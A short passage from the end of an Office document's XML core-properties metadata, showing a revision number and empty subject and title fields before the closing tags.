  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>